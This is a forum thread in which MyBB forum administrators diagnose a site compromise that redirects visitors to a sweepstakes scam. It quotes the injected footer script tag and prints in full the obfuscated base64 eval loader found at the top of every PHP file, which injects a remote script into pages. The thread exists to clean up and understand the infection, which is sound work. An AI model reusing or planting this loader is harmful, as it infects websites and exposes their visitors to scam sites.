Malicious code

[moze229]

Ok,

Let's start out with assuming that I'm dumb. I'm not a programmer or a MyBB guru, but I understand enough about how things work to be confused. (If that makes any sense.) I don't see how this could have happened.

Someone, somehow, has placed malicious code on my site, leading people to some sweepstakes website. Last week, I noticed that a registered user was trying to include these types of threads so I banned the username, email, IP, etc. They haven't been back, but now I notice that when loading the main page, SOMEWHERE this code is loading. I can't find it. Where would someone place this code and how can I get rid of it? An added bonus would be a quick lesson in security on how to prevent this from happening again. Did I leave a hole somewhere? Shall I leave my site url here? Thanks in advance.

BTW - I went back to the server level and no one but me has accessed the actual server itself. They were only able to get in through MyBB somehow, somewhere. All of my .htaccess files appear to be in tact and untouched. Any other redirect areas to look for?

[Paul H.]

Please give us your site URL.

[moze229]

Thanks PJGIH

http://www.groupr1100s.com/forum/

[Paul H.]

I'm not being redirected anywhere.

---

However, in your footer there is the following code:

<script src="http://sweepstakesandcontestsinfo.com/nl.php?zl=1"></script>

[Mumak]

I run into the exactly same problem. I haven't noticed it, but have been notified by some users that they sometimes got redirected to other sites...
When I inspected the forum via ftp I noticed that ALL php files have injected malicious code at the beginning. So I had to clean all php files. Here's the code as injected at beginning of each php file (encoded as base64):

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZSIpKXsgcmV0dXJuIGJhc2U2NF9kZWNvZGUoIlBITmpjbWx3ZENCemNtTTlJbWgwZEhBNkx5OXpkMlZsY0hOMFlXdGxjMkZ1WkdOdmJuUmxjM1J6YVc1bWJ5NWpiMjB2YW5NdWNHaHdQM005TVNJK1BDOXpZM0pwY0hRKyIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAgICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSkpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQxJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcpOyAgIH0gIH0="));?>

If you decode it and again the arguments returned you'll find the site which it's being redirected to:
if (!stristr($_SERVER["HTTP_USER_AGENT"],"google")){ return "<script src="http://sweepstakesandcontestsinfo.com/js.php?s=1"></script>";

But now my question - is this a vulnerability of improper php/server configuration or MyBB ?
How can I avoid such attacks again ?

[Paul H.]

Check cPanel and FTP passwords security.

[Mumak]

Are you sure that the issue is password breach and not a vulnerability?
I think if password would be breached, there would be a much serious damage done.

---

Seems much more sites have been hacked this way. Here's some more info:

http://sucuri.net/new-malware-sweepstake...w-com.html
http://suhastech.com/wordpress/wordpress...w-info-do/
http://www.phpbb.com/community/viewtopic...&t=2141510

Suhas Tech made a little php tool that can remove the scam.

I still don't know what kind of vulnerability has been exploited and what needs to be patched to avoid it..

[pavemen]

if they infecting phpbb and wordpress along with MyBB, its not a MyBB issue. Its likely a PHP or MySQL vulnerability or a server level issue that is being exploited.

[Nathan Malcolm]

If it's a MyBB exploit, they'd attack much larger boards.

[moze229]

Thanks all!

Mumak - I did notice the strange code in the PHP files after I posted this message. I tried decoding one to find some code, but it didn't "decode" enough for me to see exactly what was going on.

I've thoroughly explored all password vulnerabilities and cannot find any. There has been no activity at the server level unless initiated by me. I have an email out to the host to see if they have any ideas - we'll see what they say.

I'll have to concur with the password vulnerability at this point - it just seems that if one were to have access to password protected areas, they would do much more than add a redirect script. I also have to agree that if Phpbb and Wordpress is being affected, it's not necessarily a MyBB hack. It only makes sense at this point that PHP has a serious vulnerability. Perhaps MySQL, but seems less likely.

Well, I'm off to edit all of my PHP files. I'd sure like to know how in the hell access was gained. I'm worried that I did something wrong or left something insecure somewhere. I'm also sure that after I edit all of these files that they are going to get changed again until I can figure out what's going on.

So where do we go from here? Should this be reported somewhere, and if so, where?

---

I just remembered something...

As I was editing PHP files, I remembered that this particular user also had added an attachment to their posts that was a .jpg file. I didn't even think about it before simply deleting the file both times. (This user tried to register twice - I unsuccessfully locked them out the first time.) So now I'm thinking that this script was introduced via this file. The file was attached just like any other .jpg attachment, but of course there was no image visible.

I would think that you'd have to at least try and open it up for it to do anything. I suppose all it would take is one user to click on it and that's it. Not sure. Thought I would add that in in case someone has any ideas on possible MyBB attachment vulnerabilities. I wouldn't even know where to begin checking for that.

BTW - it took me a long time to clean this up. Some of the PHP files, perhaps even most were files that do not change. But, due to my ignorance of which files change frequently and when, I cleaned each PHP file.